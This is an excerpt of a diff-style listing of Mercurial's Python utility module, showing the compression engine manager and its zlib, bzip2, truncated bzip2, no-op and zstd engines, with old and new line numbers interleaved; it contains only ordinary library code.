3172
3184
3173 def __iter__(self):
3185 def __iter__(self):
3174 return iter(self._engines.keys())
3186 return iter(self._engines.keys())
3175
3187
3176 def register(self, engine):
3188 def register(self, engine):
3177 """Register a compression engine with the manager.
3189 """Register a compression engine with the manager.
3178
3190
3179 The argument must be a ``compressionengine`` instance.
3191 The argument must be a ``compressionengine`` instance.
3180 """
3192 """
3181 if not isinstance(engine, compressionengine):
3193 if not isinstance(engine, compressionengine):
3182 raise ValueError(_('argument must be a compressionengine'))
3194 raise ValueError(_('argument must be a compressionengine'))
3183
3195
3184 name = engine.name()
3196 name = engine.name()
3185
3197
3186 if name in self._engines:
3198 if name in self._engines:
3187 raise error.Abort(_('compression engine %s already registered') %
3199 raise error.Abort(_('compression engine %s already registered') %
3188 name)
3200 name)
3189
3201
3190 bundleinfo = engine.bundletype()
3202 bundleinfo = engine.bundletype()
3191 if bundleinfo:
3203 if bundleinfo:
3192 bundlename, bundletype = bundleinfo
3204 bundlename, bundletype = bundleinfo
3193
3205
3194 if bundlename in self._bundlenames:
3206 if bundlename in self._bundlenames:
3195 raise error.Abort(_('bundle name %s already registered') %
3207 raise error.Abort(_('bundle name %s already registered') %
3196 bundlename)
3208 bundlename)
3197 if bundletype in self._bundletypes:
3209 if bundletype in self._bundletypes:
3198 raise error.Abort(_('bundle type %s already registered by %s') %
3210 raise error.Abort(_('bundle type %s already registered by %s') %
3199 (bundletype, self._bundletypes[bundletype]))
3211 (bundletype, self._bundletypes[bundletype]))
3200
3212
3201 # No external facing name declared.
3213 # No external facing name declared.
3202 if bundlename:
3214 if bundlename:
3203 self._bundlenames[bundlename] = name
3215 self._bundlenames[bundlename] = name
3204
3216
3205 self._bundletypes[bundletype] = name
3217 self._bundletypes[bundletype] = name
3206
3218
3207 wiresupport = engine.wireprotosupport()
3219 wiresupport = engine.wireprotosupport()
3208 if wiresupport:
3220 if wiresupport:
3209 wiretype = wiresupport.name
3221 wiretype = wiresupport.name
3210 if wiretype in self._wiretypes:
3222 if wiretype in self._wiretypes:
3211 raise error.Abort(_('wire protocol compression %s already '
3223 raise error.Abort(_('wire protocol compression %s already '
3212 'registered by %s') %
3224 'registered by %s') %
3213 (wiretype, self._wiretypes[wiretype]))
3225 (wiretype, self._wiretypes[wiretype]))
3214
3226
3215 self._wiretypes[wiretype] = name
3227 self._wiretypes[wiretype] = name
3216
3228
3217 revlogheader = engine.revlogheader()
3229 revlogheader = engine.revlogheader()
3218 if revlogheader and revlogheader in self._revlogheaders:
3230 if revlogheader and revlogheader in self._revlogheaders:
3219 raise error.Abort(_('revlog header %s already registered by %s') %
3231 raise error.Abort(_('revlog header %s already registered by %s') %
3220 (revlogheader, self._revlogheaders[revlogheader]))
3232 (revlogheader, self._revlogheaders[revlogheader]))
3221
3233
3222 if revlogheader:
3234 if revlogheader:
3223 self._revlogheaders[revlogheader] = name
3235 self._revlogheaders[revlogheader] = name
3224
3236
3225 self._engines[name] = engine
3237 self._engines[name] = engine
3226
3238
3227 @property
3239 @property
3228 def supportedbundlenames(self):
3240 def supportedbundlenames(self):
3229 return set(self._bundlenames.keys())
3241 return set(self._bundlenames.keys())
3230
3242
3231 @property
3243 @property
3232 def supportedbundletypes(self):
3244 def supportedbundletypes(self):
3233 return set(self._bundletypes.keys())
3245 return set(self._bundletypes.keys())
3234
3246
3235 def forbundlename(self, bundlename):
3247 def forbundlename(self, bundlename):
3236 """Obtain a compression engine registered to a bundle name.
3248 """Obtain a compression engine registered to a bundle name.
3237
3249
3238 Will raise KeyError if the bundle type isn't registered.
3250 Will raise KeyError if the bundle type isn't registered.
3239
3251
3240 Will abort if the engine is known but not available.
3252 Will abort if the engine is known but not available.
3241 """
3253 """
3242 engine = self._engines[self._bundlenames[bundlename]]
3254 engine = self._engines[self._bundlenames[bundlename]]
3243 if not engine.available():
3255 if not engine.available():
3244 raise error.Abort(_('compression engine %s could not be loaded') %
3256 raise error.Abort(_('compression engine %s could not be loaded') %
3245 engine.name())
3257 engine.name())
3246 return engine
3258 return engine
3247
3259
3248 def forbundletype(self, bundletype):
3260 def forbundletype(self, bundletype):
3249 """Obtain a compression engine registered to a bundle type.
3261 """Obtain a compression engine registered to a bundle type.
3250
3262
3251 Will raise KeyError if the bundle type isn't registered.
3263 Will raise KeyError if the bundle type isn't registered.
3252
3264
3253 Will abort if the engine is known but not available.
3265 Will abort if the engine is known but not available.
3254 """
3266 """
3255 engine = self._engines[self._bundletypes[bundletype]]
3267 engine = self._engines[self._bundletypes[bundletype]]
3256 if not engine.available():
3268 if not engine.available():
3257 raise error.Abort(_('compression engine %s could not be loaded') %
3269 raise error.Abort(_('compression engine %s could not be loaded') %
3258 engine.name())
3270 engine.name())
3259 return engine
3271 return engine
3260
3272
3261 def supportedwireengines(self, role, onlyavailable=True):
3273 def supportedwireengines(self, role, onlyavailable=True):
3262 """Obtain compression engines that support the wire protocol.
3274 """Obtain compression engines that support the wire protocol.
3263
3275
3264 Returns a list of engines in prioritized order, most desired first.
3276 Returns a list of engines in prioritized order, most desired first.
3265
3277
3266 If ``onlyavailable`` is set, filter out engines that can't be
3278 If ``onlyavailable`` is set, filter out engines that can't be
3267 loaded.
3279 loaded.
3268 """
3280 """
3269 assert role in (SERVERROLE, CLIENTROLE)
3281 assert role in (SERVERROLE, CLIENTROLE)
3270
3282
3271 attr = 'serverpriority' if role == SERVERROLE else 'clientpriority'
3283 attr = 'serverpriority' if role == SERVERROLE else 'clientpriority'
3272
3284
3273 engines = [self._engines[e] for e in self._wiretypes.values()]
3285 engines = [self._engines[e] for e in self._wiretypes.values()]
3274 if onlyavailable:
3286 if onlyavailable:
3275 engines = [e for e in engines if e.available()]
3287 engines = [e for e in engines if e.available()]
3276
3288
3277 def getkey(e):
3289 def getkey(e):
3278 # Sort first by priority, highest first. In case of tie, sort
3290 # Sort first by priority, highest first. In case of tie, sort
3279 # alphabetically. This is arbitrary, but ensures output is
3291 # alphabetically. This is arbitrary, but ensures output is
3280 # stable.
3292 # stable.
3281 w = e.wireprotosupport()
3293 w = e.wireprotosupport()
3282 return -1 * getattr(w, attr), w.name
3294 return -1 * getattr(w, attr), w.name
3283
3295
3284 return list(sorted(engines, key=getkey))
3296 return list(sorted(engines, key=getkey))
3285
3297
3286 def forwiretype(self, wiretype):
3298 def forwiretype(self, wiretype):
3287 engine = self._engines[self._wiretypes[wiretype]]
3299 engine = self._engines[self._wiretypes[wiretype]]
3288 if not engine.available():
3300 if not engine.available():
3289 raise error.Abort(_('compression engine %s could not be loaded') %
3301 raise error.Abort(_('compression engine %s could not be loaded') %
3290 engine.name())
3302 engine.name())
3291 return engine
3303 return engine
3292
3304
3293 def forrevlogheader(self, header):
3305 def forrevlogheader(self, header):
3294 """Obtain a compression engine registered to a revlog header.
3306 """Obtain a compression engine registered to a revlog header.
3295
3307
3296 Will raise KeyError if the revlog header value isn't registered.
3308 Will raise KeyError if the revlog header value isn't registered.
3297 """
3309 """
3298 return self._engines[self._revlogheaders[header]]
3310 return self._engines[self._revlogheaders[header]]
3299
3311
3300 compengines = compressormanager()
3312 compengines = compressormanager()
3301
3313
3302 class compressionengine(object):
3314 class compressionengine(object):
3303 """Base class for compression engines.
3315 """Base class for compression engines.
3304
3316
3305 Compression engines must implement the interface defined by this class.
3317 Compression engines must implement the interface defined by this class.
3306 """
3318 """
3307 def name(self):
3319 def name(self):
3308 """Returns the name of the compression engine.
3320 """Returns the name of the compression engine.
3309
3321
3310 This is the key the engine is registered under.
3322 This is the key the engine is registered under.
3311
3323
3312 This method must be implemented.
3324 This method must be implemented.
3313 """
3325 """
3314 raise NotImplementedError()
3326 raise NotImplementedError()
3315
3327
3316 def available(self):
3328 def available(self):
3317 """Whether the compression engine is available.
3329 """Whether the compression engine is available.
3318
3330
3319 The intent of this method is to allow optional compression engines
3331 The intent of this method is to allow optional compression engines
3320 that may not be available in all installations (such as engines relying
3332 that may not be available in all installations (such as engines relying
3321 on C extensions that may not be present).
3333 on C extensions that may not be present).
3322 """
3334 """
3323 return True
3335 return True
3324
3336
3325 def bundletype(self):
3337 def bundletype(self):
3326 """Describes bundle identifiers for this engine.
3338 """Describes bundle identifiers for this engine.
3327
3339
3328 If this compression engine isn't supported for bundles, returns None.
3340 If this compression engine isn't supported for bundles, returns None.
3329
3341
3330 If this engine can be used for bundles, returns a 2-tuple of strings of
3342 If this engine can be used for bundles, returns a 2-tuple of strings of
3331 the user-facing "bundle spec" compression name and an internal
3343 the user-facing "bundle spec" compression name and an internal
3332 identifier used to denote the compression format within bundles. To
3344 identifier used to denote the compression format within bundles. To
3333 exclude the name from external usage, set the first element to ``None``.
3345 exclude the name from external usage, set the first element to ``None``.
3334
3346
3335 If bundle compression is supported, the class must also implement
3347 If bundle compression is supported, the class must also implement
3336 ``compressstream`` and `decompressorreader``.
3348 ``compressstream`` and `decompressorreader``.
3337
3349
3338 The docstring of this method is used in the help system to tell users
3350 The docstring of this method is used in the help system to tell users
3339 about this engine.
3351 about this engine.
3340 """
3352 """
3341 return None
3353 return None
3342
3354
3343 def wireprotosupport(self):
3355 def wireprotosupport(self):
3344 """Declare support for this compression format on the wire protocol.
3356 """Declare support for this compression format on the wire protocol.
3345
3357
3346 If this compression engine isn't supported for compressing wire
3358 If this compression engine isn't supported for compressing wire
3347 protocol payloads, returns None.
3359 protocol payloads, returns None.
3348
3360
3349 Otherwise, returns ``compenginewireprotosupport`` with the following
3361 Otherwise, returns ``compenginewireprotosupport`` with the following
3350 fields:
3362 fields:
3351
3363
3352 * String format identifier
3364 * String format identifier
3353 * Integer priority for the server
3365 * Integer priority for the server
3354 * Integer priority for the client
3366 * Integer priority for the client
3355
3367
3356 The integer priorities are used to order the advertisement of format
3368 The integer priorities are used to order the advertisement of format
3357 support by server and client. The highest integer is advertised
3369 support by server and client. The highest integer is advertised
3358 first. Integers with non-positive values aren't advertised.
3370 first. Integers with non-positive values aren't advertised.
3359
3371
3360 The priority values are somewhat arbitrary and only used for default
3372 The priority values are somewhat arbitrary and only used for default
3361 ordering. The relative order can be changed via config options.
3373 ordering. The relative order can be changed via config options.
3362
3374
3363 If wire protocol compression is supported, the class must also implement
3375 If wire protocol compression is supported, the class must also implement
3364 ``compressstream`` and ``decompressorreader``.
3376 ``compressstream`` and ``decompressorreader``.
3365 """
3377 """
3366 return None
3378 return None
3367
3379
3368 def revlogheader(self):
3380 def revlogheader(self):
3369 """Header added to revlog chunks that identifies this engine.
3381 """Header added to revlog chunks that identifies this engine.
3370
3382
3371 If this engine can be used to compress revlogs, this method should
3383 If this engine can be used to compress revlogs, this method should
3372 return the bytes used to identify chunks compressed with this engine.
3384 return the bytes used to identify chunks compressed with this engine.
3373 Else, the method should return ``None`` to indicate it does not
3385 Else, the method should return ``None`` to indicate it does not
3374 participate in revlog compression.
3386 participate in revlog compression.
3375 """
3387 """
3376 return None
3388 return None
3377
3389
3378 def compressstream(self, it, opts=None):
3390 def compressstream(self, it, opts=None):
3379 """Compress an iterator of chunks.
3391 """Compress an iterator of chunks.
3380
3392
3381 The method receives an iterator (ideally a generator) of chunks of
3393 The method receives an iterator (ideally a generator) of chunks of
3382 bytes to be compressed. It returns an iterator (ideally a generator)
3394 bytes to be compressed. It returns an iterator (ideally a generator)
3383 of bytes of chunks representing the compressed output.
3395 of bytes of chunks representing the compressed output.
3384
3396
3385 Optionally accepts an argument defining how to perform compression.
3397 Optionally accepts an argument defining how to perform compression.
3386 Each engine treats this argument differently.
3398 Each engine treats this argument differently.
3387 """
3399 """
3388 raise NotImplementedError()
3400 raise NotImplementedError()
3389
3401
3390 def decompressorreader(self, fh):
3402 def decompressorreader(self, fh):
3391 """Perform decompression on a file object.
3403 """Perform decompression on a file object.
3392
3404
3393 Argument is an object with a ``read(size)`` method that returns
3405 Argument is an object with a ``read(size)`` method that returns
3394 compressed data. Return value is an object with a ``read(size)`` that
3406 compressed data. Return value is an object with a ``read(size)`` that
3395 returns uncompressed data.
3407 returns uncompressed data.
3396 """
3408 """
3397 raise NotImplementedError()
3409 raise NotImplementedError()
3398
3410
3399 def revlogcompressor(self, opts=None):
3411 def revlogcompressor(self, opts=None):
3400 """Obtain an object that can be used to compress revlog entries.
3412 """Obtain an object that can be used to compress revlog entries.
3401
3413
3402 The object has a ``compress(data)`` method that compresses binary
3414 The object has a ``compress(data)`` method that compresses binary
3403 data. This method returns compressed binary data or ``None`` if
3415 data. This method returns compressed binary data or ``None`` if
3404 the data could not be compressed (too small, not compressible, etc).
3416 the data could not be compressed (too small, not compressible, etc).
3405 The returned data should have a header uniquely identifying this
3417 The returned data should have a header uniquely identifying this
3406 compression format so decompression can be routed to this engine.
3418 compression format so decompression can be routed to this engine.
3407 This header should be identified by the ``revlogheader()`` return
3419 This header should be identified by the ``revlogheader()`` return
3408 value.
3420 value.
3409
3421
3410 The object has a ``decompress(data)`` method that decompresses
3422 The object has a ``decompress(data)`` method that decompresses
3411 data. The method will only be called if ``data`` begins with
3423 data. The method will only be called if ``data`` begins with
3412 ``revlogheader()``. The method should return the raw, uncompressed
3424 ``revlogheader()``. The method should return the raw, uncompressed
3413 data or raise a ``RevlogError``.
3425 data or raise a ``RevlogError``.
3414
3426
3415 The object is reusable but is not thread safe.
3427 The object is reusable but is not thread safe.
3416 """
3428 """
3417 raise NotImplementedError()
3429 raise NotImplementedError()
3418
3430
3419 class _zlibengine(compressionengine):
3431 class _zlibengine(compressionengine):
3420 def name(self):
3432 def name(self):
3421 return 'zlib'
3433 return 'zlib'
3422
3434
3423 def bundletype(self):
3435 def bundletype(self):
3424 """zlib compression using the DEFLATE algorithm.
3436 """zlib compression using the DEFLATE algorithm.
3425
3437
3426 All Mercurial clients should support this format. The compression
3438 All Mercurial clients should support this format. The compression
3427 algorithm strikes a reasonable balance between compression ratio
3439 algorithm strikes a reasonable balance between compression ratio
3428 and size.
3440 and size.
3429 """
3441 """
3430 return 'gzip', 'GZ'
3442 return 'gzip', 'GZ'
3431
3443
3432 def wireprotosupport(self):
3444 def wireprotosupport(self):
3433 return compewireprotosupport('zlib', 20, 20)
3445 return compewireprotosupport('zlib', 20, 20)
3434
3446
3435 def revlogheader(self):
3447 def revlogheader(self):
3436 return 'x'
3448 return 'x'
3437
3449
3438 def compressstream(self, it, opts=None):
3450 def compressstream(self, it, opts=None):
3439 opts = opts or {}
3451 opts = opts or {}
3440
3452
3441 z = zlib.compressobj(opts.get('level', -1))
3453 z = zlib.compressobj(opts.get('level', -1))
3442 for chunk in it:
3454 for chunk in it:
3443 data = z.compress(chunk)
3455 data = z.compress(chunk)
3444 # Not all calls to compress emit data. It is cheaper to inspect
3456 # Not all calls to compress emit data. It is cheaper to inspect
3445 # here than to feed empty chunks through generator.
3457 # here than to feed empty chunks through generator.
3446 if data:
3458 if data:
3447 yield data
3459 yield data
3448
3460
3449 yield z.flush()
3461 yield z.flush()
3450
3462
3451 def decompressorreader(self, fh):
3463 def decompressorreader(self, fh):
3452 def gen():
3464 def gen():
3453 d = zlib.decompressobj()
3465 d = zlib.decompressobj()
3454 for chunk in filechunkiter(fh):
3466 for chunk in filechunkiter(fh):
3455 while chunk:
3467 while chunk:
3456 # Limit output size to limit memory.
3468 # Limit output size to limit memory.
3457 yield d.decompress(chunk, 2 ** 18)
3469 yield d.decompress(chunk, 2 ** 18)
3458 chunk = d.unconsumed_tail
3470 chunk = d.unconsumed_tail
3459
3471
3460 return chunkbuffer(gen())
3472 return chunkbuffer(gen())
3461
3473
3462 class zlibrevlogcompressor(object):
3474 class zlibrevlogcompressor(object):
3463 def compress(self, data):
3475 def compress(self, data):
3464 insize = len(data)
3476 insize = len(data)
3465 # Caller handles empty input case.
3477 # Caller handles empty input case.
3466 assert insize > 0
3478 assert insize > 0
3467
3479
3468 if insize < 44:
3480 if insize < 44:
3469 return None
3481 return None
3470
3482
3471 elif insize <= 1000000:
3483 elif insize <= 1000000:
3472 compressed = zlib.compress(data)
3484 compressed = zlib.compress(data)
3473 if len(compressed) < insize:
3485 if len(compressed) < insize:
3474 return compressed
3486 return compressed
3475 return None
3487 return None
3476
3488
3477 # zlib makes an internal copy of the input buffer, doubling
3489 # zlib makes an internal copy of the input buffer, doubling
3478 # memory usage for large inputs. So do streaming compression
3490 # memory usage for large inputs. So do streaming compression
3479 # on large inputs.
3491 # on large inputs.
3480 else:
3492 else:
3481 z = zlib.compressobj()
3493 z = zlib.compressobj()
3482 parts = []
3494 parts = []
3483 pos = 0
3495 pos = 0
3484 while pos < insize:
3496 while pos < insize:
3485 pos2 = pos + 2**20
3497 pos2 = pos + 2**20
3486 parts.append(z.compress(data[pos:pos2]))
3498 parts.append(z.compress(data[pos:pos2]))
3487 pos = pos2
3499 pos = pos2
3488 parts.append(z.flush())
3500 parts.append(z.flush())
3489
3501
3490 if sum(map(len, parts)) < insize:
3502 if sum(map(len, parts)) < insize:
3491 return ''.join(parts)
3503 return ''.join(parts)
3492 return None
3504 return None
3493
3505
3494 def decompress(self, data):
3506 def decompress(self, data):
3495 try:
3507 try:
3496 return zlib.decompress(data)
3508 return zlib.decompress(data)
3497 except zlib.error as e:
3509 except zlib.error as e:
3498 raise error.RevlogError(_('revlog decompress error: %s') %
3510 raise error.RevlogError(_('revlog decompress error: %s') %
3499 str(e))
3511 str(e))
3500
3512
3501 def revlogcompressor(self, opts=None):
3513 def revlogcompressor(self, opts=None):
3502 return self.zlibrevlogcompressor()
3514 return self.zlibrevlogcompressor()
3503
3515
3504 compengines.register(_zlibengine())
3516 compengines.register(_zlibengine())
3505
3517
3506 class _bz2engine(compressionengine):
3518 class _bz2engine(compressionengine):
3507 def name(self):
3519 def name(self):
3508 return 'bz2'
3520 return 'bz2'
3509
3521
3510 def bundletype(self):
3522 def bundletype(self):
3511 """An algorithm that produces smaller bundles than ``gzip``.
3523 """An algorithm that produces smaller bundles than ``gzip``.
3512
3524
3513 All Mercurial clients should support this format.
3525 All Mercurial clients should support this format.
3514
3526
3515 This engine will likely produce smaller bundles than ``gzip`` but
3527 This engine will likely produce smaller bundles than ``gzip`` but
3516 will be significantly slower, both during compression and
3528 will be significantly slower, both during compression and
3517 decompression.
3529 decompression.
3518
3530
3519 If available, the ``zstd`` engine can yield similar or better
3531 If available, the ``zstd`` engine can yield similar or better
3520 compression at much higher speeds.
3532 compression at much higher speeds.
3521 """
3533 """
3522 return 'bzip2', 'BZ'
3534 return 'bzip2', 'BZ'
3523
3535
3524 # We declare a protocol name but don't advertise by default because
3536 # We declare a protocol name but don't advertise by default because
3525 # it is slow.
3537 # it is slow.
3526 def wireprotosupport(self):
3538 def wireprotosupport(self):
3527 return compewireprotosupport('bzip2', 0, 0)
3539 return compewireprotosupport('bzip2', 0, 0)
3528
3540
3529 def compressstream(self, it, opts=None):
3541 def compressstream(self, it, opts=None):
3530 opts = opts or {}
3542 opts = opts or {}
3531 z = bz2.BZ2Compressor(opts.get('level', 9))
3543 z = bz2.BZ2Compressor(opts.get('level', 9))
3532 for chunk in it:
3544 for chunk in it:
3533 data = z.compress(chunk)
3545 data = z.compress(chunk)
3534 if data:
3546 if data:
3535 yield data
3547 yield data
3536
3548
3537 yield z.flush()
3549 yield z.flush()
3538
3550
3539 def decompressorreader(self, fh):
3551 def decompressorreader(self, fh):
3540 def gen():
3552 def gen():
3541 d = bz2.BZ2Decompressor()
3553 d = bz2.BZ2Decompressor()
3542 for chunk in filechunkiter(fh):
3554 for chunk in filechunkiter(fh):
3543 yield d.decompress(chunk)
3555 yield d.decompress(chunk)
3544
3556
3545 return chunkbuffer(gen())
3557 return chunkbuffer(gen())
3546
3558
3547 compengines.register(_bz2engine())
3559 compengines.register(_bz2engine())
3548
3560
3549 class _truncatedbz2engine(compressionengine):
3561 class _truncatedbz2engine(compressionengine):
3550 def name(self):
3562 def name(self):
3551 return 'bz2truncated'
3563 return 'bz2truncated'
3552
3564
3553 def bundletype(self):
3565 def bundletype(self):
3554 return None, '_truncatedBZ'
3566 return None, '_truncatedBZ'
3555
3567
3556 # We don't implement compressstream because it is hackily handled elsewhere.
3568 # We don't implement compressstream because it is hackily handled elsewhere.
3557
3569
3558 def decompressorreader(self, fh):
3570 def decompressorreader(self, fh):
3559 def gen():
3571 def gen():
3560 # The input stream doesn't have the 'BZ' header. So add it back.
3572 # The input stream doesn't have the 'BZ' header. So add it back.
3561 d = bz2.BZ2Decompressor()
3573 d = bz2.BZ2Decompressor()
3562 d.decompress('BZ')
3574 d.decompress('BZ')
3563 for chunk in filechunkiter(fh):
3575 for chunk in filechunkiter(fh):
3564 yield d.decompress(chunk)
3576 yield d.decompress(chunk)
3565
3577
3566 return chunkbuffer(gen())
3578 return chunkbuffer(gen())
3567
3579
3568 compengines.register(_truncatedbz2engine())
3580 compengines.register(_truncatedbz2engine())
3569
3581
3570 class _noopengine(compressionengine):
3582 class _noopengine(compressionengine):
3571 def name(self):
3583 def name(self):
3572 return 'none'
3584 return 'none'
3573
3585
3574 def bundletype(self):
3586 def bundletype(self):
3575 """No compression is performed.
3587 """No compression is performed.
3576
3588
3577 Use this compression engine to explicitly disable compression.
3589 Use this compression engine to explicitly disable compression.
3578 """
3590 """
3579 return 'none', 'UN'
3591 return 'none', 'UN'
3580
3592
3581 # Clients always support uncompressed payloads. Servers don't because
3593 # Clients always support uncompressed payloads. Servers don't because
3582 # unless you are on a fast network, uncompressed payloads can easily
3594 # unless you are on a fast network, uncompressed payloads can easily
3583 # saturate your network pipe.
3595 # saturate your network pipe.
3584 def wireprotosupport(self):
3596 def wireprotosupport(self):
3585 return compewireprotosupport('none', 0, 10)
3597 return compewireprotosupport('none', 0, 10)
3586
3598
3587 # We don't implement revlogheader because it is handled specially
3599 # We don't implement revlogheader because it is handled specially
3588 # in the revlog class.
3600 # in the revlog class.
3589
3601
3590 def compressstream(self, it, opts=None):
3602 def compressstream(self, it, opts=None):
3591 return it
3603 return it
3592
3604
3593 def decompressorreader(self, fh):
3605 def decompressorreader(self, fh):
3594 return fh
3606 return fh
3595
3607
3596 class nooprevlogcompressor(object):
3608 class nooprevlogcompressor(object):
3597 def compress(self, data):
3609 def compress(self, data):
3598 return None
3610 return None
3599
3611
3600 def revlogcompressor(self, opts=None):
3612 def revlogcompressor(self, opts=None):
3601 return self.nooprevlogcompressor()
3613 return self.nooprevlogcompressor()
3602
3614
3603 compengines.register(_noopengine())
3615 compengines.register(_noopengine())
3604
3616
3605 class _zstdengine(compressionengine):
3617 class _zstdengine(compressionengine):
3606 def name(self):
3618 def name(self):
3607 return 'zstd'
3619 return 'zstd'
3608
3620
3609 @propertycache
3621 @propertycache
3610 def _module(self):
3622 def _module(self):
3611 # Not all installs have the zstd module available. So defer importing
3623 # Not all installs have the zstd module available. So defer importing
3612 # until first access.
3624 # until first access.
3613 try:
3625 try:
3614 from . import zstd
3626 from . import zstd
3615 # Force delayed import.
3627 # Force delayed import.
3616 zstd.__version__
3628 zstd.__version__
3617 return zstd
3629 return zstd
3618 except ImportError:
3630 except ImportError:
3619 return None
3631 return None
3620
3632
3621 def available(self):
3633 def available(self):
3622 return bool(self._module)
3634 return bool(self._module)
3623
3635
3624 def bundletype(self):
3636 def bundletype(self):
3625 """A modern compression algorithm that is fast and highly flexible.
3637 """A modern compression algorithm that is fast and highly flexible.
3626
3638
3627 Only supported by Mercurial 4.1 and newer clients.
3639 Only supported by Mercurial 4.1 and newer clients.
3628
3640
3629 With the default settings, zstd compression is both faster and yields
3641 With the default settings, zstd compression is both faster and yields
3630 better compression than ``gzip``. It also frequently yields better
3642 better compression than ``gzip``. It also frequently yields better
3631 compression than ``bzip2`` while operating at much higher speeds.
3643 compression than ``bzip2`` while operating at much higher speeds.
3632
3644
3633 If this engine is available and backwards compatibility is not a
3645 If this engine is available and backwards compatibility is not a
3634 concern, it is likely the best available engine.
3646 concern, it is likely the best available engine.
3635 """
3647 """
3636 return 'zstd', 'ZS'
3648 return 'zstd', 'ZS'
3637
3649
3638 def wireprotosupport(self):
3650 def wireprotosupport(self):
3639 return compewireprotosupport('zstd', 50, 50)
3651 return compewireprotosupport('zstd', 50, 50)
3640
3652
3641 def revlogheader(self):
3653 def revlogheader(self):
3642 return '\x28'
3654 return '\x28'
3643
3655
3644 def compressstream(self, it, opts=None):
3656 def compressstream(self, it, opts=None):
3645 opts = opts or {}
3657 opts = opts or {}
3646 # zstd level 3 is almost always significantly faster than zlib
3658 # zstd level 3 is almost always significantly faster than zlib
3647 # while providing no worse compression. It strikes a good balance
3659 # while providing no worse compression. It strikes a good balance
3648 # between speed and compression.
3660 # between speed and compression.
3649 level = opts.get('level', 3)
3661 level = opts.get('level', 3)
3650
3662
3651 zstd = self._module
3663 zstd = self._module
3652 z = zstd.ZstdCompressor(level=level).compressobj()
3664 z = zstd.ZstdCompressor(level=level).compressobj()
3653 for chunk in it:
3665 for chunk in it:
3654 data = z.compress(chunk)
3666 data = z.compress(chunk)
3655 if data:
3667 if data:
3656 yield data
3668 yield data
3657
3669
3658 yield z.flush()
3670 yield z.flush()
3659
3671
3660 def decompressorreader(self, fh):
3672 def decompressorreader(self, fh):
3661 zstd = self._module
3673 zstd = self._module
3662 dctx = zstd.ZstdDecompressor()
3674 dctx = zstd.ZstdDecompressor()
3663 return chunkbuffer(dctx.read_from(fh))
3675 return chunkbuffer(dctx.read_from(fh))
3664
3676
3665 class zstdrevlogcompressor(object):
3677 class zstdrevlogcompressor(object):
3666 def __init__(self, zstd, level=3):
3678 def __init__(self, zstd, level=3):
3667 # Writing the content size adds a few bytes to the output. However,
3679 # Writing the content size adds a few bytes to the output. However,
3668 # it allows decompression to be more optimal since we can
3680 # it allows decompression to be more optimal since we can
3669 # pre-allocate a buffer to hold the result.
3681 # pre-allocate a buffer to hold the result.
3670 self._cctx = zstd.ZstdCompressor(level=level,
3682 self._cctx = zstd.ZstdCompressor(level=level,
3671 write_content_size=True)
3683 write_content_size=True)
3672 self._dctx = zstd.ZstdDecompressor()
3684 self._dctx = zstd.ZstdDecompressor()
3673 self._compinsize = zstd.COMPRESSION_RECOMMENDED_INPUT_SIZE
3685 self._compinsize = zstd.COMPRESSION_RECOMMENDED_INPUT_SIZE
3674 self._decompinsize = zstd.DECOMPRESSION_RECOMMENDED_INPUT_SIZE
3686 self._decompinsize = zstd.DECOMPRESSION_RECOMMENDED_INPUT_SIZE
3675
3687
3676 def compress(self, data):
3688 def compress(self, data):
3677 insize = len(data)
3689 insize = len(data)
3678 # Caller handles empty input case.
3690 # Caller handles empty input case.
3679 assert insize > 0
3691 assert insize > 0
3680
3692
3681 if insize < 50:
3693 if insize < 50:
3682 return None
3694 return None
3683
3695
3684 elif insize <= 1000000:
3696 elif insize <= 1000000:
3685 compressed = self._cctx.compress(data)
3697 compressed = self._cctx.compress(data)
3686 if len(compressed) < insize:
3698 if len(compressed) < insize:
3687 return compressed
3699 return compressed
3688 return None
3700 return None
3689 else:
3701 else:
3690 z = self._cctx.compressobj()
3702 z = self._cctx.compressobj()
3691 chunks = []
3703 chunks = []
3692 pos = 0
3704 pos = 0
3693 while pos < insize:
3705 while pos < insize:
3694 pos2 = pos + self._compinsize
3706 pos2 = pos + self._compinsize
3695 chunk = z.compress(data[pos:pos2])
3707 chunk = z.compress(data[pos:pos2])
3696 if chunk:
3708 if chunk:
3697 chunks.append(chunk)
3709 chunks.append(chunk)
3698 pos = pos2
3710 pos = pos2
3699 chunks.append(z.flush())
3711 chunks.append(z.flush())
3700
3712
3701 if sum(map(len, chunks)) < insize:
3713 if sum(map(len, chunks)) < insize:
3702 return ''.join(chunks)
3714 return ''.join(chunks)
3703 return None
3715 return None
3704
3716
3705 def decompress(self, data):
3717 def decompress(self, data):
3706 insize = len(data)
3718 insize = len(data)
3707
3719
3708 try:
3720 try:
3709 # This was measured to be faster than other streaming
3721 # This was measured to be faster than other streaming
3710 # decompressors.
3722 # decompressors.
3711 dobj = self._dctx.decompressobj()
3723 dobj = self._dctx.decompressobj()
3712 chunks = []
3724 chunks = []
3713 pos = 0
3725 pos = 0
3714 while pos < insize:
3726 while pos < insize:
3715 pos2 = pos + self._decompinsize
3727 pos2 = pos + self._decompinsize
3716 chunk = dobj.decompress(data[pos:pos2])
3728 chunk = dobj.decompress(data[pos:pos2])
3717 if chunk:
3729 if chunk:
3718 chunks.append(chunk)
3730 chunks.append(chunk)
3719 pos = pos2
3731 pos = pos2
3720 # Frame should be exhausted, so no finish() API.
3732 # Frame should be exhausted, so no finish() API.
3721
3733
3722 return ''.join(chunks)
3734 return ''.join(chunks)
3723 except Exception as e:
3735 except Exception as e:
3724 raise error.RevlogError(_('revlog decompress error: %s') %
3736 raise error.RevlogError(_('revlog decompress error: %s') %
3725 str(e))
3737 str(e))
3726
3738
3727 def revlogcompressor(self, opts=None):
3739 def revlogcompressor(self, opts=None):
3728 opts = opts or {}
3740 opts = opts or {}
3729 return self.zstdrevlogcompressor(self._module,
3741 return self.zstdrevlogcompressor(self._module,
3730 level=opts.get('level', 3))
3742 level=opts.get('level', 3))
3731
3743
3732 compengines.register(_zstdengine())
3744 compengines.register(_zstdengine())
3733
3745
3734 def bundlecompressiontopics():
3746 def bundlecompressiontopics():
3735 """Obtains a list of available bundle compressions for use in help."""
3747 """Obtains a list of available bundle compressions for use in help."""
3736 # help.makeitemsdocs() expects a dict of names to items with a .__doc__.
3748 # help.makeitemsdocs() expects a dict of names to items with a .__doc__.
3737 items = {}
3749 items = {}
3738
3750
3739 # We need to format the docstring. So use a dummy object/type to hold it
3751 # We need to format the docstring. So use a dummy object/type to hold it
3740 # rather than mutating the original.
3752 # rather than mutating the original.
3741 class docobject(object):
3753 class docobject(object):
3742 pass
3754 pass
3743
3755
3744 for name in compengines:
3756 for name in compengines:
3745 engine = compengines[name]
3757 engine = compengines[name]
3746
3758
3747 if not engine.available():
3759 if not engine.available():
